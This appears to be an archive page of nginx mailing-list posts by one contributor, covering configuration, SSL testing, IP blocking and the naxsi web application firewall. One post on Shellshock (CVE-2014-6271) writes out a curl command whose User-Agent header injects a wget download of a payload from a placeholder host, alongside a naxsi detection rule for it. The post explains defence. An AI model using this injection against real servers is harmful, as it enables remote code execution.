zero.bs/naxis-rules-manual.html
regards,
mex
Posted at Nginx Forum:
https://forum.nginx.org/read.php?2,274339,274358#msg-274358
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
/anti-dos-websockets-best-practices/
- https://gist.github.com/subudeepak/9897212
- https://kaazing.com/2012/02/28/html5-websocket-security-is-strong/
regards,
mex
Posted at Nginx Forum:
https://forum.nginx.org/read.php?2,273438,273440#msg-273440
grey rules means they are deactivated
i'm gonna write a blog on how we use spike + doxi-rules in our
setup, but it will take some time.
Posted at Nginx Forum:
https://forum.nginx.org/read.php?2,271695,271844#msg-271844
___
nginx mailing list
nginx@ng
Hi c0nw0nk,
mex here, inital creator of http://spike.nginx-goodies.com/rules/
and maintainer of Doxi-Rules
https://bitbucket.org/lazy_dogtown/doxi-rules/overview
(this us where the rules live we create with spike :)
the doxi-rules in its current state are inspired by emerging threats rules,
and
How do you transfer metrics from nginx to your pfsense?
mayak Wrote:
---
> We are blocking 2.2 million addresses, however, we do it at the
> firewall/router (pfsense pfBlocker).
>
> Ultra fast.
>
> HTH
>
> Mayak
>
> ___
,
mex
Cox, Eric S Wrote:
---
> Currently we track all access logs realtime via an in house built log
> aggregation solution. Various algorithms are setup to detect said IPS
> whether it be by hit rate, country, known types of attacks e
e up
with ipset add / del which is fast as hell and has a build-in TTL
if you have a huge and dynamic set of ips to be blocked
this is the way you should go
cheers,
mex
Posted at Nginx Forum:
https://forum.nginx.org/read.php?2,270680,270757#msg-270757
__
Hi Alex,
you can do it that way or use something like this
inside your server {} block:
allow IP1;
allow IP2;
allow IP3;
deny all;
http://nginx.org/en/docs/http/ngx_http_access_module.html#allow
Posted at Nginx Forum:
https://forum.nginx.org/read.php?2,266738,266750#m
Hi Alex
this might be an inspiration for your task:
https://www.howtoforge.com/nginx-how-to-block-visitors-by-country-with-the-geoip-module-debian-ubuntu
cheers,
mex
Posted at Nginx Forum:
https://forum.nginx.org/read.php?2,266738,266739#msg-266739
for a nice and simple*) but yet powerfull WAF-solution for nginx you
might want to try naxsi https://github.com/nbs-system/naxsi
*) simple in terms of: easy to setup, easy to maintain, easy to adjust
cheers,
mex
Posted at Nginx Forum:
https://forum.nginx.org/read.php?2,266350,266356#msg
hould trust this.
for debuggging, try
curl -v http://JIRA_IP:JIRA_PORT/ from the server nginx runs on., to see, if
you have
access to the ressource you configured in proxy_pass
cheers,
mex
Posted at Nginx Forum:
https://forum.nginx.org/read.php?2,266336,2
asic
realm="$host"';
more_set_input_headers 'Authorization: $http_authorization';
...
}
cheers,
mex
Posted at Nginx Forum:
https://forum.nginx.org/read.php?2,265220,265220#msg-265220
___
ngin
" 1;
default 0;
}
...
server {
...
if ($blocked_ua) { return 403; }
...
}
...
}
cheers,
mex
p.s. repost, because of forum-snafu
Posted at Nginx Forum:
https://forum.nginx.org/read.php?2,263478,263483#msg-263483
_
hi daniel,
hiw did you installed nginx, manually (self-compiled) or
through your distratos repo?
can you provide the nginx -V - output?
usually /etc/nginx/nginx.conf is the default-config, if not given;
nginx -V will tell what defaults arre used in your config.
cheers,
mex
Posted at
diffferences reverse vs forward-proxy
read
http://stackoverflow.com/questions/224664/difference-between-proxy-server-and-reverse-proxy-server
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,261649,261650#msg-261650
___
nginx
hi,
is there a way to log access (ip, date, size of payload) within the
stream-module?
i found error - log configurable for the stream only so far.
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,261411,261411#msg-261411
if you ask for something like mod_cgi from the apache-world, there is
nothing like
this; the following article might help to define requirements and find a
solution:
>
https://www.digitalocean.com/community/tutorials/a-comparison-of-web-servers-for-python-based-web-applications
Nitin Solanki W
ay
>
gunicorn (+nginx for static content, caching, ssl-offload and waf-features)
is what we use here
too on a couple of installations; its rock solid and easy to use.
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,260791
thank you very much, looks promising!
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,259613,259617#msg-259617
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
://nginx.org/en/docs/http/ngx_http_access_module.html#allow
atm we use a packetfilter, but having this feature in nginx - stream {}
would be
a great addition.
thanx in advance,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,259613,259613#msg-259613
thank you for your comment; i'll re-test with 1.8 and adjust the document
accordingly.
i think the config-workaround is obsolete too.
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,259325,259372#msg-259372
___
Hi,
nginx + libressl works without any issues; we have it running since
last summer and have seen no problems so far, but did not tested
it with 1.8.x though
the following explians how to do it:
https://8ack.de/guides/nginx-libressl-first-test
cheers,
mex
Posted at Nginx Forum:
http
if you have questions on naxsi, feel free to join the naxsi-discuss - ml
https://groups.google.com/forum/#!forum/naxsi-discuss
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,257792,257801#msg-257801
___
nginx mailing list
uot; "s:$ATTACK:8" id:42000393 ;
see -> http://spike.nginx-goodies.com/rules/view/42000393
there is also an extended ruleset available
-> https://bitbucket.org/lazy_dogtown/doxi-rules
cheers,
mex
Posted at Nginx Forum:
http://forum
Hello,
what does naxsi has to do with it? you probably wanted to talk about nginx,
naxsi is a 3rd-party-module, extending nginx on WAF-features
four your probkem you might wnat to check
http://nginx.org/en/docs/http/ngx_http_limit_req_module.html
cheers,
mex
Posted at Nginx Forum
ad-> reading requests from clients
writ-> reading request body, processes request, or writes
response to a client
wait-> keep-alive connections, actually it is ac - (read +
writ)
ct -> checktime (connection time) for this check
cheers,
mex
Post
o say
goodbye. We plan to remove support for SPDY in early 2016, and to also
remove support for the TLS extension named NPN in favor of ALPN in Chrome at
the same time. Server developers are strongly encouraged to move to HTTP/2
and ALPN."
cheers,
mex
Posted at Nginx Forum:
http://forum
you'll need a lot of packages from the SDK-DVDs. IIRC those are not
available as online-repos, but situation might have changed.
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,256323,256325#msg-256325
___
nginx mailing list
use this directive and other content handler directives in the same
location.
For example, this directive and the proxy_pass directive should not be used
in the same location."
what you can do is use the access_by_lua or rewrite_by_lua - directive
cheers,
mex
Posted at Nginx Forum
or rewrite-phase, make your processing and
pass the result to your upstream-servers using proxy_pass and all the
upstream {} - goodies
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,256226,256282#msg-256282
___
nginx mailing
is will work as expected, except you put in the ip.
but then the apache on the other side should be configred
with the ip in the virtualhost
cheers, mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,255696,255704#msg-255704
___
nginx
hi,
does this link helps?
>
http://gadelkareem.com/2012/03/25/limit-requests-per-ip-on-nginx-using-httplimitzonemodule-and-httplimitreqmodule-except-whitelist/
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,255697,255703#msg-255
hi,
does you errorlog tells you something?
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,255158,255162#msg-255162
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
nginx has a last flag too:
http://nginx.org/en/docs/http/ngx_http_rewrite_module.html#rewrite
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,254969,255005#msg-255005
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/lis
so it looks more like a php/processing-problem, no?
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,254876,254910#msg-254910
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
Hi,
you can use the nginx-sticky-module if you need sticky sessions
https://bitbucket.org/nginx-goodies/nginx-sticky-module-ng
it just has no way to extract the routing-info from tomcat-routes (yet,
we're working on it) and comes with an own cookie, but is
production-ready
cheers,
Hi,
do you see this problem when accessing static files as well as php-files
rendered by php-fpm?
did you made a perftest on /static/small.css /path/index.php?
would be interesting to see if this is a php-based problem.
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org
2 hours
to flush the ssl_session_cache?
[1] -
https://timtaubert.de/blog/2014/11/the-sad-state-of-server-side-tls-session-resumption-implementations/
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,254881,254881#msg-254881
___
ngin
nope, this seems to be a longer-known problem:
http://forum.nginx.org/read.php?10,233386,template=head
i (at least) did not got it working, either with "default 300;"
or with
set katimeout 300;
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,254833,254879#msg-254879
_
ml#if
http://nginx.org/en/docs/http/ngx_http_map_module.html
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,254833,254835#msg-254835
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
please delete your browser-history for every browser, restart your nginx and
test again.
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,254825,254827#msg-254827
___
nginx mailing list
nginx@nginx.org
http
the logs on your appserver.
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,254770,254781#msg-254781
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
nice! http://mozilla.github.io/server-side-tls/ssl-config-generator/
did not tested all profiles, but intermediates gives A+ on ssllabs,
supports every browser expect winxp/ie6
and has all the goodies enabled
$ ./testssl.sh example.com
#
Hi Raul,
> I don't know what cookie is, the site is http://urbania.pe
>
if you dont know the cookie-name you cannot reset them from nginx,
but i see quite a few in my developer-tools.
i'd suggest you create a location that match this false redirect-location
and reset the cookies from within th
Hi Raúl,
do you have the cookie-name or is it random?
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,254207,254208#msg-254208
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
for scanners/indexes of public services your might search for "shodan"
for the valid use of security trhough obscurity:
"My thoughts on this are that obscuring information is helpful to security
in many cases as it can force an attacker to generate more "noise" which can
be detected.
Where obsc
?
i think you'd need to configure reverse-dns for your site's name to point
to that server's ip, and you must use A-records, not CNAMES; if this
sounds uncommon to you ask your hosting-provider, they should be able to
answer
your questions.
cheers,
mex
Posted at Nginx Forum:
hi tunist,
if you want to test your server for CCS-vuln you might use
https://www.ssllabs.com/ssltest/
or the testscript from https://testssl.sh/
when you prefer to test locally.
>
> though when i run openssl version, i see: OpenSSL 1.0.1e-fips 11 Feb
> 2013 not sure why..!?
distros backpor
CCS-scan probably, see
https://www.mare-system.de/guide-to-nginx-ssl-spdy-hsts/#ccs-early-changecipherspec-attack)
what openssl-version do you use?
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,254144,254146#msg-254146
i think it's a nice idea and surely will participate with some stuff
like securtiy-headers (CSP/X-Frame-Options etc)
single issues/questions mgith still be discussed on-list,
and it should be no problem to post updates here from
time to time.
cheers,
mex
Posted at Nginx Forum:
hi,
i'd suggest you collect your snippets in the nginx-wiki
http://wiki.nginx.org/
and link your collecftion back to http://wiki.nginx.org/Configuration
thus it will be easier to maintain and extend.
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,254125,25413
maybe related (maxims answer)
http://forum.nginx.org/read.php?2,254016,254050#msg-254050
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,254028,254123#msg-254123
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo
iirc you donw need a $1 behind alias like in rewrite-rules
http://nginx.org/en/docs/http/ngx_http_core_module.html#alias
the following should work
location /wifi {
alias /var/www/owums/public; # <-- be sure to point to 'public'!
passenger_base_uri /wifi;
passenger_app_root /var/www/
> Regarding POODLEbleed[1] issue, I've disable SSLv3 on `ssl_protocols`
thats the most important part
> directive. But, ssllabs.com says that :
>
> snip
> Downgrade attack prevention No, TLS_FALLBACK_SCSV not supported (more
> info[2])
TLS_FALLBACK_SCSV also prevents downgrades fro
what does cipherscan says?
https://github.com/jvehent/cipherscan
you can run that from the server nginx runs on
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,254028,254082#msg-254082
___
nginx mailing list
nginx@nginx.org
http://mailman.ng
hi,
> >
> > - make sure you are testing correct server.
> >
i'd suggest to configure an additional access/error-log
in that server {} - block, to be 100% sure.
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,2
the right server {} - config
we can try to figure out whats happening.
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,254016,254027#msg-254027
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo
hi,
did you even tried too google it?
dork: "logging post body nginx"
http://stackoverflow.com/questions/4939382/logging-post-data-from-request-body
cheers,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,254007,254009#
it is more a performance- than a security-issue (diskspace, i/o, buffering)
etc
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,253959,253960#msg-253960
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
did you tried
server_name _;
already?
did you chained the certs for a.com / c.com in the correct order?
see http://nginx.org/en/docs/http/configuring_https_servers.html /
An SSL certificate with several names
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,253929,253946#msg-25394
i dont know of an out-of-the-box-solution, bit this might point into the
right direction:
- https://github.com/yaoweibin/nginx_tcp_proxy_module
-
http://stackoverflow.com/questions/5337122/is-it-possible-to-forward-non-http-connecting-request-to-some-other-port-in-ngin
cheers,
mex
Posted at
btw, it seems impossible to have
...
ssl_protocols TLSv1.2;
...
and a testresult of
SSLv2 NOT offered (ok)
SSLv3 offered
TLSv1 not offered
TLSv1.1 not offered
TLSv1.2 not offered
are you sure you have tested the right machine?
i'd suggest you run the testssl.sh - script against https://localho
r-outdated-openssl-versions
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,253665,253666#msg-253666
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
curl -k -H 'User-Agent: () { somedummytext; }; /usr/bin/wget -O
/tmp/nastyexe http://myserver.com/nastyexe' https://target.com/cgi-bin/hi
:D
if, you should try to match for (regex-pattern) "\(\) {"
#since this must be written like this;
an additional space between "() {" would render the e
hi pekka,
since the attack, esp. against CGI, is possible through (custom)
headers/cookies etc
you'd need some waf-functionalities (afaik)
naxsi, an nginx-based waf, has a signature for this since wednesday
MainRule "str:() {" "msg:Possible Remote code execution through Bash
CVE-2014-6271" "mz
foo ...
http://www.openwall.com/lists/oss-security/2014/09/24/17
"Note that on Linux systems where /bin/sh is symlinked to /bin/bash,
any popen() / system() calls from within languages such as PHP would
be of concern due to the ability to control HTTP_* in the env.
/mz"
$ ls -la /bin/sh
lrwxrwx
/09/ruleset-update-possible-remote-code.html
regards & happy patching
(and sorry for this slightly OT-post)
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,253532,253532#msg-253532
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
can you post your config please?
beside this, is there a reason you stick to AJP-connector? iirc this is not
a default-module for nginx,
and on my testing i found the HTTP-connector as fast as AJP, but working
kind of smoother
for tomcat-appservers
regards,
mex
Posted at Nginx Forum:
http
RSION_NUMBER 0x10002002L
the openssl-binary compiles find, but i cannot check with nginx-mainline
right now, maybe later
thanks for the patch!
regards,
mex
regards, mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,251718,251793#msg-251793
updated: static version and new perftests included
https://www.mare-system.de/blog/page/1405201517/
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,251718,251760#msg-251760
___
nginx mailing list
nginx@nginx.org
http
i wanted to test if it is possible. And it is. There
> are no
> > functional or performance-issues, as far as i can test, and building
> nginx +
> > libressl is easy, once you figured out how to do it. The advantages
> of using
> > LibreSSL in the long run, from my point of
> I think the cleanest solution would be if the backend could receive 1
> request and just split the content/response into chunks and send
> what's
> immediately available (html head + perhaps page header as well) as
> first
> chunk and send the rest afterwards.
sounds tricky ... i must admit, i a
amic" part that must wait for the backend?
>
> Exactly.
>
> Cheers,
> Martin
>
> > the only solution i could think of in such an asynchronous delivery
> > is using nginx + lua, or maybe varnish (iirc you yould mark parts of
> a
> > page cacheable, but do
us delivery
is using nginx + lua, or maybe varnish (iirc you yould mark parts of a
page cacheable, but dont know if you can deliver asynchronously though)
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,251717,251719#msg-251719
_
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,251718,251718#msg-251718
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
unrelated, but i found the dancing-part amusing :D
https://www.youtube.com/watch?v=7xO-yEaiFoQ
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,249761,249761#msg-249761
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org
PONG
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,249437,249450#msg-249450
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
depending on your setup you might think about serving static
content and videos directly from nginx:
http://www.nginxtips.com/optimizing-nginx-for-video-sites/
anything served directly from nginx, not going to apache will boost your
performance.
> Mex, That's a high amount of redu
the nginx-servers are still idleing at
around 0.2
we use to nginx to cache static content as well as dynamic pages
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,249437,249445#msg-249445
___
nginx mailing list
nginx
if your site is silviosiefke.com, there is no tls-service available on port
443
can you please paste the output of nginx -t / nginx -V ?
testssl.sh v2.0rc2 (https://testssl.sh)
U
maybe you should capture the traffic with wireshark to see which party sends
what packet in which order.
regrads,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,249320,249365#msg-249365
___
nginx mailing list
nginx@nginx.org
http
> Hence I have to place nginx before apache without disturbing the
> setup.
>
works seemlessly and speeds up your apache, when using proxy_cache,
assuming your
apache listens on 8080
server {
listen 80;
server_name myhost;
location / {
root /path/to/myapp/public;
proxy_set_heade
> Can anyone tell my what thebenefits are ( apart from .htaccess
> support,
> which I see all too often as a curse ) why anyone would do this in
> preference to just using a pure nginx solution?
>
- out-of-the-box running stuff like mod_php / suphp
- excessive use of rewite-rules in .htacces to
you should make your apache listen on 127.0.0.1:80 and nginx on your
external IP:80 (443 if you need ssl)
did you checked the manuals in wthe wiki?
http://wiki.nginx.org/Configuration -> proxying examples
http://wiki.nginx.org/LikeApache-> all you need for a start
after this you should check pr
hi,
what is your os (name and version)?
where do you have the ciphers from bwt?
i'd suggest you test the tls-version yourself with testssl.sh
https://bitbucket.org/nginx-goodies/testssl.sh
(note: you need a current openssl-version on the machine you test
from)
regards,
mex
Post
the community is responsive and open for feature-requests or bugreports.
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,249248,249294#msg-249294
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
i'm seen the question below on nginx-dev from september last year,
http://forum.nginx.org/read.php?29,243031,243031#msg-243031
I've seen some attempts to use polarssl one year ago and would
like to restart delevopment in that direction, so i'd like to re-issue this
question
from Aleksandar Lazi
else
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,249105,249226#msg-249226
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
> Also it's worth to look at the recent nginx blog post regarding
> heartbleed:
>
> http://nginx.com/blog/nginx-and-the-heartbleed-vulnerability/
>
thanx for the link maxim, has been incorporated
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php
Guide to Nginx + SSL + SPDY has been updated with some infos, links and
tests
regarding heartbleed
https://www.mare-system.de/guide-to-nginx-ssl-spdy-hsts/#heartbleed
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,249102,249131#msg-249131
/diagnosis_of_the_openssl_heartbleed_bug/
http://security.stackexchange.com/search?q=heartbleed
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,249102,249102#msg-249102
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
thanx, nice tool!
i integrated this into our ssl-guide
https://www.mare-system.de/guide-to-nginx-ssl-spdy-hsts/#testing-ssl-setups
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,248997,249000#msg-249000
___
nginx mailing list
nginx@nginx.or
disclaimer: i'm not the cretator of that script; i'm just maintaing the
repo. owner & contact might be found on the webpage https://testssl.sh/
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,248997,248997#msg-248997
_
d test for compatibility with
future-releases of nginx.
feel free to contact me if you have requirements for that module,
contact-data might be found in the readme.
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,247882,247882#
hi coderman,
icreasing the headerr_size is not a solution, since i look for a generic
solution to circumvent
the outcome of those malicious request.
a possible way to handle this is a lighweight WAF-solution,
lua comes to my mind :)
regards,
mex
p.s. we're working on a lighweigh
o Large
my question: is there a generic way to check the size of such headers like
cookies etc
and to cut them off, or should we live with such malicious intent?
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,246597,246597#msg-246597
___
Hi List,
i have a strange performance-issue on a server that serves
static-files only (http + https), if files are bigger than 5k:
- rps drops from 6500 rps (empty file) to 13 rps when requesting a file >
5k
- perftest with location /perftest/ is at 8000 rps (https) / 15000 rps
(http)
- perftest
hi darren,
your ciphers look very good!
i included your suggestion in my ssl-guide, looking forward to perftest
those
cipher_suites.
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,243341,243594#msg-243594
___
nginx
ation.
Download: https://www.feistyduck.com/books/openssl-cookbook/
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,243541,243541#msg-243541
___
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
answer, i'll invest some time and check your toolchains,
especially systemtap. is systemtap included in openresty? looks like the
perfect tool to create some nagios-plugins upon.
regards,
mex
Posted at Nginx Forum:
http://forum.nginx.org/read.php?2,243201,243452#msg-2
1 - 100 of 163 matches
Mail list logo
